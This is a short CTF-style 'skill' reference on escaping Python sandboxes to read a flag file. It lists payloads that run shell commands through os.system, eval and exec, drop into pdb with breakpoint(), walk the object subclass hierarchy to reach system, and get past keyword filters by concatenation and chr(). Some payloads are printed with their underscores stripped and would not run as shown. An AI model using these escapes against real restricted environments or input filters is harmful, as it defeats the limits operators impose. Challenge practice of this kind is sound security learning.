Python Jail Escape Skill

Quick Workflow

Progress:

• Identify restrictions (blocked keywords/chars)
• Try basic escapes first
• If builtins blocked, use class hierarchy
• Bypass filters with encoding/concatenation
• Execute command to get flag

Quick Reference - Common Escapes

Basic command execution

import('os').system('cat flag.txt') eval("import('os').system('id')") exec("import os; os.system('ls')")

Using breakpoint (Python 3.7+)

breakpoint() # Drops into pdb, then !cat flag.txt

No builtins - class hierarchy

().class.base.subclasses()[132].init.globals['system']('cat flag')

Keyword bypass

import('o'+'s').system('cat flag') import(chr(111)+chr(115)).system('cat flag')

Reference Files

Topic Reference

Bypass Techniques reference/bypass.md

Complete Payloads reference/payloads.md

Quick Debugging

Find useful class index

for i, c in enumerate(().class.base.subclasses()): if 'wrap' in str(c): print(i, c)

Check available builtins

dir(builtins)